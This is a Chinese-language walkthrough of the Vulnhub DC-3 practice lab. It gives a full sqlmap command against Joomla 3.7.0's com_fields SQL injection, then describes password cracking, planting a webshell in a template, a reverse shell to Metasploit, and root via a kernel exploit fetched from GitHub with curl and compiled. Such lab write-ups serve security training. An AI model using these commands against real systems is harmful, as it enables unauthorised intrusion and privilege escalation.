Vulnhub DC-3靶机通关

Vulnhub DC-3靶机通关

下载地址：https://www.vulnhub.com/series/dc,199/

安装好dc-3靶机，通过工具扫描ip，在10.155

进入网站，通过插件获取指纹信息，查看到该站点是joomalcms，joomla存在很多历史漏洞，由于目前不知道版本号，所以无法推测存在那种漏洞

根据提示，我们需要自己拿到root权限，后边不会有任何提示

通过joomla的扫描脚本，扫描到了joomla的版本号为：3.7.0 该版本存在了sql注入漏洞

同样还扫描到了后台地址，尝试弱密码无果，去网上寻找关于3.7.0的漏洞

通过0组的资料库，搜索到了poc，接下来使用sqlmap去跑后台密码

sqlmap -u "http://www.0-sec.org/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

通过sqlmap枚举到了管理员密码，但是需要破解

john the Ripper是一个快速的密码破解程序，目前可用于Unix，Windows，DOS和OpenVMS的许多口味。其主要目的是检测弱Unix密码。除了在各种Unix系统上最常见的几种crypt（3）密码哈希类型之外，现在支持的还有Windows LM哈希，以及社区增强版本中的大量其他哈希和密码。

通过john爆破密码

登录后台，如下步骤，可以通过写文件方法写入webshell。

直接覆盖index.php，或者重新写入文件，url地址是在

http://192.168.10.155/templates/protostar/shell.php

这里我临时修改为了大马，蚁剑webshell管理工具不太好用

http://192.168.10.155/templates/protostar/shell.php

使用msf联动的方法反弹到本地msf中

可以看到当前是低权限，开始提权操作

查看当前的内核版本

去searchspolit搜索相应的提权包，使用4.4全版本的提全包

为了方便直接本地不起服务了，直接github找到包，下载到目标服务器

curl -O https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

tar -xvf exploit.tar

./compile.sh

./doubleput

编译文件提权成功